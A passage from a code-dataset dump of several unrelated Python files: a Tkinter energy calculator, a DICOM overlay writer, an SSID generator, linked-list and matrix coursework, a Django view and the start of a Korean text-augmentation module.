pass\n","repo_name":"kernsuite-debian/spead2","sub_path":"src/spead2/send/asyncio.py","file_name":"asyncio.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38830387290","text":"from __future__ import print_function\nimport __future__\ntry:\n from Tkinter import Button, Tk, Toplevel, Label, Listbox, Scrollbar,\\\n LabelFrame, Entry, Frame, Radiobutton, Text, Checkbutton\n import Tkinter\n import tkMessageBox\n from tkFileDialog import *\nexcept ImportError:\n from tkinter import Button, Tk, Toplevel, Label, Listbox, Scrollbar,\\\n LabelFrame, Entry, Frame, Radiobutton, Text, Checkbutton\n import tkinter as Tkinter\n import tkinter.messagebox as tkMessageBox\n from tkinter.filedialog import *\nimport threading\nimport math\nimport os\n\nDEFAULT_CODE = \"\"\"# Use Python syntax to define the function f that takes\n# one argument (the scalar product) and returns the associated energy.\n# Example - Riesz energy\ndef f(x):\n return pow((2*(1-x)),-2)\n\n\"\"\"\n\nclass MainWindow:\n def __init__(self):\n self.root = Tk()\n self.input_type = Tkinter.IntVar()\n self.input_type.set(1)\n self.normalize_data = Tkinter.IntVar()\n self.normalize_data.set(1)\n self.root.title(\"Code energy calculator\")\n self.left_frame = LabelFrame(self.root,\n text=\"Input and output\")\n self.left_frame.pack(side=Tkinter.LEFT, fill=Tkinter.BOTH,\n expand=True, padx=(10, 5), pady=10)\n self.right_frame = LabelFrame(self.root, text=\"Code\")\n self.right_frame.pack(side=Tkinter.RIGHT, fill=Tkinter.BOTH,\n expand=True, padx=(5, 10), pady=10)\n code_hscroll = Scrollbar(self.right_frame, orient=Tkinter.HORIZONTAL)\n code_hscroll.pack(side=Tkinter.BOTTOM, fill=Tkinter.X)\n code_vscroll = Scrollbar(self.right_frame)\n code_vscroll.pack(side=Tkinter.RIGHT, fill=Tkinter.Y)\n self.code_text = Text(self.right_frame, wrap=Tkinter.NONE,\n xscrollcommand=code_hscroll.set,\n yscrollcommand=code_vscroll.set)\n self.code_text.pack()\n self.code_text.insert(Tkinter.INSERT, DEFAULT_CODE)\n code_hscroll.config(command=self.code_text.xview)\n code_vscroll.config(command=self.code_text.yview)\n self.input_file_entry =\\\n self.create_and_add_file_field(self.left_frame, \"Input file\", 5, False)\n self.spherical_coord_option =\\\n Radiobutton(self.left_frame, text=\"Spherical coordinates\",\n variable=self.input_type, value=1)\n self.spherical_coord_option.pack(anchor=Tkinter.W)\n self.cartesian_coord_option =\\\n Radiobutton(self.left_frame, text=\"Cartesian coordinates\",\n variable=self.input_type, value=2)\n self.cartesian_coord_option.pack(anchor=Tkinter.W)\n self.spherical_coord_option.select()\n self.output_file_entry =\\\n self.create_and_add_file_field(self.left_frame, \"Output file\", 5, True)\n self.normalize_check = Checkbutton(self.left_frame, text=\"Normalize data\",\n variable=self.normalize_data,\n offvalue=0, onvalue=1)\n self.normalize_check.pack()\n self.normalize_check.deselect()\n self.do_button = Button(self.left_frame, text=\"Run\", command=self.run)\n self.do_button.pack(side=Tkinter.BOTTOM, pady=(0, 10))\n\n def create_and_add_file_field(self, parent, title, pad, is_save):\n title_label = Label(parent, text=title)\n title_label.pack(side=Tkinter.TOP, padx=pad)\n container_frame = Frame(parent)\n container_frame.pack(side=Tkinter.TOP, padx=pad, pady=(0, pad))\n filename_entry = Entry(container_frame)\n filename_entry.pack(side=Tkinter.LEFT)\n browse_button = \\\n Button(container_frame, text=\"Browse...\",\n command=lambda: self.select_file(filename_entry, is_save))\n browse_button.pack(side=Tkinter.RIGHT)\n return filename_entry\n\n @staticmethod\n def select_file(text_field, is_save):\n text_field.delete(0, Tkinter.END)\n if is_save:\n filename = asksaveasfilename()\n else:\n filename = askopenfilename()\n text_field.insert(0, filename)\n\n def run(self):\n input_fname = self.input_file_entry.get()\n output_fname = self.output_file_entry.get()\n code = self.code_text.get(1.0, Tkinter.END)\n do_work(input_fname, output_fname, code,\n self.input_type.get(), self.normalize_data.get())\n\n def show(self):\n self.root.mainloop()\n\n\ndef spherical_to_cartesian(ro, azim, incl):\n x = ro * math.sin(incl) * math.cos(azim)\n y = ro * math.sin(incl) * math.sin(azim)\n z = ro * math.cos(incl)\n return (x,y,z)\n\ndef scalar_product(vec1, vec2):\n return vec1[0] * vec2[0] + vec1[1] * vec2[1] + vec1[2] * vec2[2]\n\ndef sqr(x):\n return x*x\n\ndef normalized(pt):\n length = math.sqrt(sqr(pt[0]) + sqr(pt[1]) + sqr(pt[2]))\n if length==0:\n return pt\n return (pt[0] / length, pt[1] / length, pt[2] / length)\n\ndef do_work(input_fname, output_fname, code, input_type, should_normalize):\n\n # Parse input\n fin = open(input_fname, 'r')\n if not fin:\n tkMessageBox.showerror(\"Error\", \"Cannot open input file\")\n fout = open(output_fname, 'w')\n if not fout:\n tkMessageBox.showerror(\"Error\", \"Cannot open output file\")\n points = []\n for line in fin:\n parts = line.split()\n if(len(parts) < 3):\n break\n point = None\n if input_type == 2:\n point = (float(parts[0]), float(ports[1]), float(ports[2]))\n elif input_type == 1:\n point =\\\n spherical_to_cartesian(float(parts[0]), float(parts[1]),\n float(parts[2]))\n else:\n print(input_type)\n raise RuntimeError(\"Don't know how to handle this input type\")\n points.append(point)\n\n # Run the code the user wrote\n user_namespace = {}\n exec(code, user_namespace)\n f = user_namespace[\"f\"]\n print(f)\n\n # Normalize points if necessary\n if should_normalize:\n for i in range(len(points)):\n points[i] = normalized(points[i])\n\n # Calculate code energy\n energy_sum = 0\n for i in range(len(points)):\n print(points[i])\n for j in range(i+1, len(points)):\n pt1 = points[i]\n pt2 = points[j]\n sp = scalar_product(pt1, pt2)\n energy_sum += f(sp)\n\n # Output\n print(energy_sum, file=fout)\n\n # Notify user\n tkMessageBox.showinfo(\"Done!\", \"Calculation complete. The answer is: \" + str(energy_sum))\n\ndef main():\n main_window = MainWindow()\n main_window.show()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"EnSec4Git/code-energy-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31713102062","text":"#ex1133 Resto da divisão\nx = int(input())\ny = int(input())\n\nlista = []\nlista.append(x)\nlista.append(y)\nlista.sort()\nx = lista[0] # x vai ser o menor numero\ny = lista[1] # y vai ser o maior numero\ninicio = x\nfim = y\n\nfor c in range(inicio + 1, fim):\n if c % 5 == 2 or c % 5 == 3:\n print(c)\n","repo_name":"wagnersistemalima/Exercicios-Python-URI-Online-Judge-Problems---Contests","sub_path":"Pacote Dawload/Projeto progamas Python/ex1133 Resto da divisão For.py","file_name":"ex1133 Resto da divisão For.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23182722011","text":"import string\nimport random\nimport os.path\nfrom random import randint\n\nclass gen_ssid(object):\n\tdef __init__(self,mask='NO_MASK_SET_YET'):\n\t\tself.mask = mask\n\t\tself.buffer = \"\"\n\t\tself.masks = []\n\t\tself.mask_file = \"\"\n\t\t\n\tdef do_mask(self):\n\t\ti = 0\n\t\twhile i < len(self.mask):\n\t\t\tif self.mask[i] == \"?\":\n\t\t\t\tself.buffer = self.buffer + {'d' : str(randint(0,9)),\n\t\t\t\t\t\t\t'l' : random.choice(string.ascii_lowercase),\n\t\t\t\t\t\t\t'u' : random.choice(string.ascii_uppercase),\n\t\t\t\t\t\t\t'a' : random.choice(string.ascii_lowercase + string.digits),\n\t\t\t\t\t\t\t'A' : random.choice(string.ascii_uppercase + string.digits),\n\t\t\t\t\t\t\t'x' : random.choice(string.hexdigits).lower(),\n\t\t\t\t\t\t\t'X' : random.choice(string.hexdigits).upper(),\n\t\t\t\t}[self.mask[i+1]]\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tself.buffer = self.buffer + self.mask[i]\n\t\t\ti += 1\n\t\tresult = self.buffer\n\t\tself.buffer = \"\"\n\t\treturn result\n\n\tdef set_random_mask(self):\n\t\tself.mask = random.choice(self.masks)\n\n\tdef return_mask_count(self):\n\t\treturn str(self.mask_count)\n\n\tdef load_mask_file(self):\n\t\tif self.mask_file:\n\t\t\tif os.path.isfile(self.mask_file):\n\t\t\t\twith open(self.mask_file) as f:\n\t\t\t\t\tfor line in f.readlines():\n\t\t\t\t\t\tself.masks.append(line.rstrip('\\n'))\n\n","repo_name":"great9/probe_toolkit","sub_path":"probe_toolkit/gen_ssid.py","file_name":"gen_ssid.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18920320013","text":" #!/usr/bin/env python\n\nimport SimpleITK as sitk\nimport sys, os, glob, json, time, csv\nfrom datetime import datetime\nimport numpy as np\n\n# For local testng\n# os.environ[\"WORKFLOW_DIR\"] = \"/sharedFolder/F1\" #\"\"\n# os.environ[\"BATCH_NAME\"] = \"batch\"\n# os.environ[\"OPERATOR_IN_DIR\"] = \"None\"\n# os.environ[\"OPERATOR_OUT_DIR\"] = \"output\"\n# os.environ[\"OPERATOR_IN_MASK_DIR\"] = \"wmls\"\n# os.environ[\"OPERATOR_IN_DCM_JSON_DIR\"] = \"GetFlairMetadata\"\n# os.environ[\"OPERATOR_IN_REFERENCE_IMAGE_DIR\"] = \"Flair_to_nii\"\n# os.environ[\"SERIES_DESC\"] = \"overlay\"\n# os.environ[\"MODALITY\"] = \"MR\"\n# os.environ[\"SERIES_NUM\"] = \"901\"\n# os.environ[\"OPACITY\"] = \"0.5\"\n# os.environ[\"COLOR_SCHEME\"] = \"/sharedFolder/colors/wmls_color_scheme.csv\"\n\nuser_specified_modality = os.environ[\"MODALITY\"]\nuser_specified_series_number = os.environ[\"SERIES_NUM\"] #Default Series Number: 901\nuser_specified_series_description = os.environ[\"SERIES_DESC\"] #Default Series Description: \"Segmentation Overlay\"\nuser_specified_opacity = float(os.environ[\"OPACITY\"]) #Default opacity: 0.5\nuser_specified_color_scheme = os.environ[\"COLOR_SCHEME\"] #Path to color scheme file\n\ndef writeimage(image, output_file_path):\n writer = sitk.ImageFileWriter()\n writer.SetFileName ( output_file_path )\n writer.Execute ( image )\n\ndef readimage(input_file_path):\n reader = sitk.ImageFileReader()\n reader.SetFileName ( input_file_path )\n image = reader.Execute()\n return image\n\ndef hex_to_rgb(hex: str):\n hex = hex[1:]\n assert len(hex) == 6\n return [int(hex[i:i + 2], 16) for i in (0, 2, 4)]\n\ndef read_color_scheme(csv_path):\n with open(csv_path) as cmap:\n reader = csv.reader(cmap, delimiter=',')\n\n # Read mapping csv to dictionary\n cdict = {}\n for row in reader:\n #second item is roi number, 4th item is color in hexadecimal\n color = row[3]\n #dict of roi label to color\n key = int(row[1])\n print('key: ', key, ' color: ', color)\n cdict[key] = color\n return cdict\n\ndef do_overlay(image, segmentation, color_dict,opacity=0.5):\n nda_mask = sitk.GetArrayFromImage(segmentation)\n nda_img = sitk.GetArrayFromImage(image)\n new_img = np.copy(nda_img)\n new_img2 = np.zeros([new_img.shape[0],new_img.shape[1],new_img.shape[2],3])\n new_img2[:,:,:,0] = new_img\n new_img2[:,:,:,1] = new_img\n new_img2[:,:,:,2] = new_img\n\n for k in color_dict:\n new_img2[nda_mask == k] += opacity * np.array(hex_to_rgb(color_dict[k]))\n\n rgb_img = sitk.GetImageFromArray(new_img2)\n rgb_img.CopyInformation(segmentation)\n\n rgb_img_rescaled = sitk.RescaleIntensity(rgb_img)\n result_img = sitk.Cast(rgb_img_rescaled,sitk.sitkVectorUInt8)\n return result_img\n\ndef get_dicom_tags_from_json(dcm_json_file):\n with open(dcm_json_file, 'r') as json_file:\n data = json.load(json_file)\n\n print(\"reading dicom metadata from json\")\n tags_to_copy = []\n\n # identify relevant tags from the original meta-data dictionary of input image\n ####patient specific tags########\n patient_id = next((value for key, value in data.items() if 'PatientID' in key),None)\n print(\"patient id: \", patient_id)\n if(patient_id != None):\n tags_to_copy.append((\"0010|0020\", patient_id))# Patient ID\n\n patient_name = next((value for key, value in data.items() if 'PatientName' in key),None)\n print(\"patient name: \", patient_name)\n if(patient_name != None):\n tags_to_copy.append((\"0010|0010\", patient_name))# Patient Name\n\n patient_sex = next((value for key, value in data.items() if 'PatientSex' in key),None)\n print(\"patient sex: \", patient_sex)\n if(patient_sex != None):\n tags_to_copy.append((\"0010|0040\", patient_sex))# Patient Sex\n\n patient_age = [value for key, value in data.items() if 'PatientAge' in key][0]\n print(\"patient age: \", patient_age)\n if(patient_age != None):\n tags_to_copy.append((\"0010|1010\", patient_age))# Patient age\n\n patient_size = next((value for key, value in data.items() if 'PatientSize' in key),None)\n print(\"patient size: \", patient_size)\n if(patient_size != None):\n tags_to_copy.append((\"0010|1020\", patient_size))# Patient size\n\n patient_wt = next((value for key, value in data.items() if 'PatientWeight' in key),None)\n print(\"patient wt: \", patient_wt)\n if(patient_wt != None):\n tags_to_copy.append((\"0010|1030\", patient_wt))# Patient wt\n\n #####study specific tags#####\n study_uid = next((value for key, value in data.items() if 'StudyInstanceUID' in key),None)\n print(\"study uid \", study_uid)\n if(study_uid != None):\n tags_to_copy.append((\"0020|000D\", study_uid))# Study Instance UID, for machine consumption\n\n study_id = next((value for key, value in data.items() if 'StudyID' in key),None)\n print(\"study id \", study_id)\n if(study_id != None):\n tags_to_copy.append((\"0020|0010\", study_id))# Study ID, for human consumption\n\n study_date = next((value for key, value in data.items() if 'StudyDate' in key),None)\n print(\"study date \", study_date)\n if(study_date != None):\n tags_to_copy.append((\"0008|0020\", study_date))# Study Date\n\n study_time = next((value for key, value in data.items() if 'StudyTime' in key),None)\n print(\"study time \", study_time)\n if(study_time != None):\n tags_to_copy.append((\"0008|0030\", study_time))# Study Time\n\n #####other tags####\n #use modality specified by user(think multi-modality pipeline) otherwise use the one from reference image\n if(user_specified_modality == \"None\"):\n modality = next((value for key, value in data.items() if 'Modality' in key),None)\n else:\n modality = user_specified_modality\n print(\"modality \", modality)\n if(study_time != None):\n tags_to_copy.append((\"0008|0060\", modality)) # Modality\n\n #accession number\n possible_accession_number_values = [value for key, value in data.items() if 'AccessionNumber' in key]\n if len(possible_accession_number_values) == 0:\n attribute_sequence = [value for key, value in data.items() if 'RequestAttributesSequence_object_object' in key][0]\n possible_accession_number_values = [value for key, value in attribute_sequence.items() if 'AccessionNumber' in key]\n if len(possible_accession_number_values) == 0:\n print(\"accession number not found\")\n accession_number_found = False\n else:\n accession_number_found = True\n accession_number = possible_accession_number_values[0]\n else:\n accession_number_found = True\n accession_number = possible_accession_number_values[0]\n\n # print('accession_number: ', accession_number)\n\n if(accession_number_found):\n tags_to_copy.append((\"0008|0050\", accession_number)) #AccessionNumber\n\n return tags_to_copy\n\ndef write_dicom_slices(outdir, tags_to_write, new_img, i):\n image_slice = new_img[:,:,i]\n\n # Tags shared by the series.\n list(map(lambda tag_value: image_slice.SetMetaData(tag_value[0], str(tag_value[1])), tags_to_write))\n\n # Slice specific tags.\n image_slice.SetMetaData(\"0008|0012\", time.strftime(\"%Y%m%d\")) # Instance Creation Date\n image_slice.SetMetaData(\"0008|0013\", time.strftime(\"%H%M%S\")) # Instance Creation Time\n\n #Setting the type to CT preserves the slice location.\n #image_slice.SetMetaData(\"0008|0060\", \"MR\") # set the type to CT so the thickness is carried over\n\n # (0020, 0032) image position patient determines the 3D spacing between slices.\n image_slice.SetMetaData(\"0020|0032\", '\\\\'.join(map(str,new_img.TransformIndexToPhysicalPoint((0,0,i))))) # Image Position (Patient)\n image_slice.SetMetaData(\"0020|0013\", str(i)) # Instance Number\n image_slice.SetMetaData(\"0020|0011\", str(user_specified_series_number)) # Series Number - default 901\n\n # Write to the output directory and add the extension dcm, to force writing in DICOM format.\n writer.SetFileName(os.path.join(outdir,str(i)+'.dcm'))\n writer.Execute(image_slice)\n\nbatch_folders = [f for f in glob.glob(os.path.join('/', os.environ['WORKFLOW_DIR'], os.environ['BATCH_NAME'], '*'))]\nprint('batch_folders: ',batch_folders)\n\nfor batch_element_dir in batch_folders:\n\n if \"None\" not in os.environ[\"OPERATOR_IN_REFERENCE_IMAGE_DIR\"]:\n print(\"Reference image folder provided\")\n ref_image_input_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_IN_REFERENCE_IMAGE_DIR'])\n ref_image_file = sorted(glob.glob(os.path.join(ref_image_input_dir, \"*.nii.gz\"), recursive=True)) or sorted(glob.glob(os.path.join(ref_image_input_dir, \"*.nrrd\"), recursive=True))\n print(ref_image_file)\n\n if \"None\" not in os.environ[\"OPERATOR_IN_MASK_DIR\"]:\n print(\"mask image folder provided\")\n mask_image_input_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_IN_MASK_DIR'])\n mask_image_file = sorted(glob.glob(os.path.join(mask_image_input_dir, \"*.nrrd\"), recursive=True)) or sorted(glob.glob(os.path.join(mask_image_input_dir, \"*.nii.gz\"), recursive=True))\n print(mask_image_file)\n\n if \"None\" not in os.environ[\"OPERATOR_IN_DCM_JSON_DIR\"]:\n print(\"Dicom json(metadata) folder provided\")\n dcm_json_input_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_IN_DCM_JSON_DIR'])\n dcm_json_file = sorted(glob.glob(os.path.join(dcm_json_input_dir, \"*.json*\"), recursive=True))\n print(dcm_json_file)\n\n if len(ref_image_file) == 0 and len(mask_image_file) == 0 and len(dcm_json_file) == 0 and len(user_specified_color_scheme) == 0:\n print(\"reference image, mask image, dicom json file or color scheme csv file not found!\")\n exit(1)\n else:\n print(f\"Starting creation of dicom seg overlay for reference image {ref_image_file} with mask {mask_image_file} and json {dcm_json_file}\")\n\n image = readimage(ref_image_file[0])\n print(\"input reference image read\")\n\n cDict = read_color_scheme(user_specified_color_scheme)\n print('# items with color mapping: ', len(cDict))\n\n # To visualize the labels image in RGB we need to reduce the intensity range ( 0-255 )\n img_255 = sitk.Cast(sitk.RescaleIntensity(image), sitk.sitkUInt8)\n\n mask = readimage(mask_image_file[0])\n print(\"label map read\")\n\n #do the overlay\n #overlaid_img = sitk.LabelOverlay(image=img_255, labelImage=mask, opacity=0.5)\n overlaid_img = do_overlay(img_255,mask,cDict,user_specified_opacity)\n print(\"Label Overlay Done\")\n\n #dicom creation\n writer = sitk.ImageFileWriter()\n writer.KeepOriginalImageUIDOn()\n\n #create new dicom tags for our dicom file\n modification_time = time.strftime(\"%H%M%S\")\n modification_date = time.strftime(\"%Y%m%d\")\n\n direction = overlaid_img.GetDirection()\n series_tag_values = [(\"0008|0031\",modification_time), # Series Time\n (\"0008|0021\",modification_date), # Series Date\n (\"0008|0008\",\"DERIVED\\\\SECONDARY\"), # Image Type\n (\"0020|000e\", \"1.2.826.0.1.3680043.2.1125.\"+modification_date+\".1\"+modification_time), # Series Instance UID\n (\"0020|0037\", '\\\\'.join(map(str, (direction[0], direction[3], direction[6],# Image Orientation (Patient)\n direction[1],direction[4],direction[7])))),\n (\"0008|103e\", user_specified_series_description)] # Series Description - default \"segmentation overlay\"\n\n #dicom tags to write\n tags_to_write = series_tag_values + get_dicom_tags_from_json(dcm_json_file[0])\n\n element_output_dir = os.path.join(batch_element_dir, os.environ['OPERATOR_OUT_DIR'])\n if not os.path.exists(element_output_dir):\n os.makedirs(element_output_dir)\n\n #write dicom images\n list(map(lambda i: write_dicom_slices(element_output_dir,tags_to_write, overlaid_img, i), range(overlaid_img.GetDepth())))\n print(\"dicom rgb overlay written\")\n","repo_name":"CBICA/TIP","sub_path":"neurodegeneration/processing-containers/seg2RGBDicom/files/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":12383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39984658384","text":"class LLele(object):\n def __init__(self, x):\n self.data = x\n self.next = None\n \n def __repr__(self):\n return str(self.data)\n\n\nclass LL(object):\n def __init__(self, head: LLele):\n self.head = head\n self.len = len(self)\n\n def insert(self, Node: LLele, index: int):\n pass\n\n def delete(self, item: LLele):\n tmp = self.head\n post = tmp.next\n\n if len(self) == 1:\n self.head = None\n return 1\n\n while post != None:\n if post.data == item:\n tmp.next = post.next\n return 1\n tmp = post\n post = tmp.next\n else:\n return 0\n\n return 0\n\n\n def reverse(self):\n prev = None\n head = self.head\n post = None\n\n while head != None:\n post = head.next\n if post == None:\n self.head = head\n \n head.next = prev\n prev = head\n head = post\n\n def __contains__(self, item):\n tmpP = self.head\n\n while tmpP != None:\n if tmpP.data == item:\n return True\n tmpP = tmpP.next\n\n return False\n\n def __repr__(self):\n if self.head == None:\n return \"None\"\n charList = []\n tmpHead = self.head\n while self.head.next != None:\n charList.append(str(self.head.data))\n self.head = self.head.next\n else:\n charList.append(str(self.head.data))\n self.head = tmpHead\n return '->'.join(charList)\n\n def __len__(self):\n length = 0\n tmpP = self.head\n\n while tmpP != None:\n length += 1\n tmpP = tmpP.next\n\n return length\n\n\nif __name__ == \"__main__\":\n from itertools import repeat\n a = [LLele(i) for i in repeat(1, times = 5)]\n\n for l1, l2 in zip(a, a[1:]):\n l1.next = l2\n l = LL(a[0])\n\n l.delete(1)\n print(l)\n # l.reverse()\n # print(l)\n","repo_name":"Alwaysproblem/simplecode","sub_path":"python_Interview/LNode.py","file_name":"LNode.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30397589839","text":"# Week 2 - 5) Write the pseudocode corresponding to functions for addition,\n# subtraction and multiplication of two matrices, and then compute\n# A = B*C-2*(B+C) where B and C are two quadratic matrices of order\n# n. What is the run-time?\n\n'''\nPSEUDOCODE\n----------\nADD_MATRIX(B, C)\n resultMatrix <- []\n FOR i IN range(length of B)\n APPEND [] TO resultMatrix\n FOR j IN range(length of C[0])\n APPEND B[i][j] + C[i][j] TO resultMatrix[i]\n\nSUB_MATRIX(B, C)\n resultMatrix <- []\n FOR i IN range(length of B)\n APPEND [] TO resultMatrix\n FOR j IN range(length of C[0])\n APPEND B[i][j] - C[i][j] TO resultMatrix[i]\n\nMULTI_MATRIX(B, C)\n resultMatrix <- []\n FOR i IN range(length of B)\n APPEND [] TO resultMatrix\n FOR j IN range(length of C[0])\n APPEND 0 TO resultMatrix[i]\n FOR k IN range(length of C)\n resultMatrix <- resultMatrix + (B[i][k] * C[k][j])\n'''\n\ndef addMatrix(matrixOne, matrixTwo):\n '''Takes two Matrix and adds them together to get a result.''' # Example: n=3\n resultMatrix = [] # O(1) --> O(1)\n # Check length of the first Matrix\n for x in range(len(matrixOne)): # O(n) --> O(3)\n resultMatrix.append([]) # O(n) --> O(3)\n # Check height of the second Matrix\n for y in range(len(matrixTwo[0])): # O(n^2) --> O(9)\n # Add the values at the same positions together to get result.\n resultMatrix[x].append(int(matrixOne[x][y]) + int(matrixTwo[x][y])) # O(n^2) --> O(9)\n \n # Return Added Matrix Result\n return resultMatrix # O(1) --> O(1)\n\ndef subMatrix(matrixOne, matrixTwo):\n '''Takes two Matrix and subtracts them from each other.''' # Example: n=2\n resultMatrix = [] # O(1) --> O(1)\n # Check length of the first Matrix\n for x in range(len(matrixOne)): # O(n) --> O(2)\n resultMatrix.append([]) # O(n) --> O(2)\n # Check height of the second Matrix\n for y in range(len(matrixOne[0])): # O(n^2) --> O(4)\n # Subtract the values at the same positions from each other to get result.\n resultMatrix[x].append(int(matrixOne[x][y]) - int(matrixTwo[x][y])) # O(n^2) --> O(4)\n\n # Return Subtracted Matrix.\n return resultMatrix # O(1) --> O(1)\n\ndef multiMatrix(matrixOne, matrixTwo):\n '''Takes two Matrix values and multiplys them together.''' # Example: n=2\n resultMatrix = [] # O(1) --> O(1)\n # Check length of the first Matrix\n for x in range(len(matrixOne)): # O(n) --> O(2)\n resultMatrix.append([]) # O(n) --> O(2)\n # Check height of the second Matrix\n for y in range(len(matrixTwo[0])): # O(n^2) --> O(4)\n resultMatrix[x].append(0) # O(n^2) --> O(4)\n # Check the length of MatrixTwo.\n for k in range(len(matrixTwo)): # O(n^3) --> O(8)\n # Multiply all the values in row of matrixOne and column of matrixTwo\n # together.\n resultMatrix[x][y] += int(matrixOne[x][k])*int(matrixTwo[k][y]) # O(n^3) --> O(8)\n\n # Returns Multiplyed Matrix.\n return resultMatrix # O(1) --> O(1)\n\ndef equationMatrix(B, C):\n '''Calculates the equation A=B*C-2*(B+C)'''\n # Part 1 = B+C\n result1 = addMatrix(B, C)\n \n # Part 2 = B*C\n result2 = multiMatrix(B, C)\n \n # Part 3 = 2*Part 1\n result3 = addMatrix(result1, result1)\n \n # Answer = Part 2 - Part 3\n answer = subMatrix(result2, result3)\n\n return answer\n\nif __name__ == \"__main__\":\n while True:\n try:\n # Determine the number of rows.\n print(\"---MATRIX ROWS---\")\n rows = 0\n while rows <= 0:\n rows = int(input(\"Number of rows: \"))\n if rows == 0:\n print(\"NEED 1 OR MORE ROWS.\")\n\n # Determine the values within the first Matrix\n print(\"\\n---MATRIX 1---\")\n matrixOne = []\n for row in range(rows):\n data = input(\"Enter numerical values (split by ','): \").split(',')\n matrixOne.append(data)\n\n # Determine the values within the second Matrix\n print(\"\\n---MATRIX 2---\")\n matrixTwo = []\n for row in range(rows):\n data = input(\"Enter numerical values (split by ','): \").split(',')\n matrixTwo.append(data)\n\n # Perform the following calculation.\n print(\"B*C-2(B+C)=\"+str(equationMatrix(matrixOne, matrixTwo)))\n except:\n break\n","repo_name":"timothydillan/210CT-Coursework","sub_path":"Basic-Py/5-Matrixes.py","file_name":"5-Matrixes.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40461232231","text":"import sqlite3\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .details import get_project_tool\nfrom ..connection import Connection\n\n@login_required\ndef project_tool_list(request):\n if request.method == 'POST':\n form_data = request.POST\n tool_id = request.POST.getlist('multicheckbox[]')\n\n\n with sqlite3.connect(Connection.db_path) as conn:\n db_cursor = conn.cursor()\n\n for id in tool_id:\n db_cursor.execute(\"\"\"\n INSERT INTO projectpartnerapp_projecttool\n (\n project_id, tool_id\n )\n VALUES (?, ?)\n \"\"\",\n (form_data['project_id'], id,)\n )\n\n return redirect(reverse('projectpartnerapp:material_form'))\n\n if (\n \"actual_method\" in form_data\n and form_data[\"actual_method\"] == \"DELETE\"\n ):\n with sqlite3.connect(Connection.db_path) as conn:\n db_cursor = conn.cursor()\n if(project_tool.tool_id == project_tool.tool.id):\n db_cursor.execute(\"\"\"\n DELETE FROM projectpartnerapp_projecttool\n WHERE id = ?\n \"\"\", (project_tool.id,))\n\n return redirect(reverse('projectpartnerapp:projects'))","repo_name":"Jeff-Hill/Project-Partner","sub_path":"projectpartnerproject/projectpartnerapp/views/project_tools/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36171483768","text":"\"\"\"\nCreated on 2022/09/12\n@ref https://github.com/catSirup/KorEDA/blob/master/eda.py\n\"\"\"\nimport os\nimport random\nimport re\nfrom typing import Dict, List, Optional\n\nimport joblib\nimport numpy as np\n\n\ndef _get_only_hangul(line: str) -> str:\n parsed_text = re.sub(r\"^[ㄱ-ㅎㅏ-ㅣ가-힣]*$\", \"\", line)\n return parsed_text\n\n\ndef _get_synonyms(word: str, wordnet: Dict[str, List[str]]) -> List[str]:\n return wordnet[word] if word in wordnet else []\n\n\n########################################################################\n# Synonym replacement\n# Replace n words in the sentence with synonyms from wordnet\n########################################################################\ndef _synonym_replacement(\n sentence: str, wordnet: Dict[str, List[str]], n: int\n) -> Optional[str]:\n words = sentence.strip().split(\" \")\n\n random_word_list = list(set(words))\n random.shuffle(random_word_list)\n num_replaced = 0\n\n for random_word in random_word_list:\n synonyms = _get_synonyms(random_word, wordnet)\n\n if len(synonyms) >= 1:\n synonym = random.choice(synonyms)\n words = [synonym if word == random_word else word for word in words]\n num_replaced += 1\n\n if num_replaced >= n:\n break\n\n return \" \".join(words) if num_replaced == 0 else None\n\n\n########################################################################\n# Random deletion\n# Randomly delete words from the sentence with probability p\n########################################################################\ndef _random_deletion(sentence: str, p: float) -> Optional[str]:\n words = sentence.strip().split(\" \")\n\n new_words = []\n for word in words:\n if np.random.binomial(1, p) == 0:\n new_words.append(word)\n\n if len(new_words) == 0:\n return None\n\n return \" \".join(new_words)\n\n\n########################################################################\n# Random swap\n# Randomly swap two words in the sentence n times\n########################################################################\ndef _random_swap(sentence: str, n: int) -> Optional[str]:\n new_words = sentence.strip().split(\" \")\n\n if len(new_words) == 1:\n return None\n\n for _ in range(n):\n new_words = _swap_word(new_words)\n\n return \" \".join(new_words)\n\n\ndef _swap_word(words: List[str]) -> List[str]:\n new_words = words.copy()\n\n ridx_1 = np.random.randint(len(new_words))\n ridx_2 = ridx_1\n\n counter = 0\n while ridx_2 == ridx_1:\n ridx_2 = np.random.randint(len(new_words))\n counter += 1\n if counter > 3:\n return words\n\n new_words[ridx_1], new_words[ridx_2] = (\n new_words[ridx_2],\n new_words[ridx_1],\n )\n return new_words\n\n\n########################################################################\n# Random insertion\n# Randomly insert n words into the sentence\n########################################################################\ndef _random_insertion(\n sentence: str, wordnet: Dict[str, List[str]], n: int\n) -> Optional[str]:\n new_words = sentence.strip().split(\" \")\n added = []\n for _ in range(n):\n added.append(_add_word(new_words, wordnet))\n\n return \" \".join(new_words) if any(added) else None\n\n\ndef _add_word(words: List[str], wordnet: Dict[str, List[str]]) -> bool:\n synonyms = []\n counter = 0\n while len(synonyms) < 1:\n random_word = 